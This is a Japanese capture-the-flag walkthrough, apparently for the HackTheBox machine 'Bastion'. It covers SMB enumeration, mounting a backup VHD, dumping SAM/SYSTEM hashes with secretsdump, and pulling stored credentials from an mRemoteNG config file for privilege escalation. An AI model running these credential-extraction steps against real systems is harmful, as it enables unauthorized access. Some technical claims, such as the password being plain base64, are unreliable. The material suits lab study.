1.nmap -sC -sT -sV 10.10.10.134でポートスキャン。
▼実行結果
+++
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-05-17T14:48:14
|_ start_date: 2022-05-17T14:43:50
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-05-17T16:48:12+02:00
|_clock-skew: mean: -40m01s, deviation: 1h09m15s, median: -2s
+++
上記の結果からsshのポートとSMBで使用するポートがあることが分かった。
2.smbclientでパスワードなしでアクセスしてみた。
# smbclient -L 10.10.10.134 -U user
+++
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
+++
とりあえずバックアップ用のディスクが気になったので、マウントして確認することにした。
3.backupsをマウント
#sudo mount //10.10.10.134/Backups /mnt/bastion/
このディレクトリが気になったのでls。
/mnt/bastion/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
+++
-rwxr-xr-x 1 root root 37M Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5.1G Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 1.2K Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 1.1K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 8.8K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root 6.4K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 2.9K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1.5K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 1.5K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 3.8K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 3.9K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7.0K Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 2.3M Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
+++
この中でvhdがあることがわかる。
これは仮想化ソフトなどが使用するファイル形式の一つでOSを丸っと写し取ったような構成になっている。
これもマウント可能なのでマウントしてSAMとSYSTEMを確認してみる。
4.vhdをマウントする。
#sudo guestmount --add /mnt/bastion/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
SAMとSYSTEMは以下のファイルにある。(資格情報が記載されているファイル/etc/passwdと/etc/shadowみたいな?)
dir:c:\windows\System32\config\
5.ローカルにコピー
6.コピーしたら以下のコマンドを実施。
# impacket-secretsdump -sam SAM -system SYSTEM local
これは、SAMとSYSTEMを正しいハッシュに変換してくれる。
+++
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501 :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000 :aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
+++
※以下の文字列はデータがないことを意味している。
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
7.以下のURLにアクセスをしてLMハッシュをクラックする。
8.クラックできたらsshでログインを行いc:\Users\ユーザ名\Desktopでuser.flagが手に入る。
★権限昇格
1.c:\Users\L4mpje\appdata\Roaming\mRemoteNG配下にあるconfCons.xmlを取得する。
mRemoteNGは、バグ修正と新機能をmRemoteに追加する。
また、confcons.xmlは接続情報や資格情報が格納されているファイル。
2.コピーできたら開きPasswordを確認する。
base64でエンコードされているのでこれをでコードし再度sshでユーザはadministratorで接続し完了。
以上。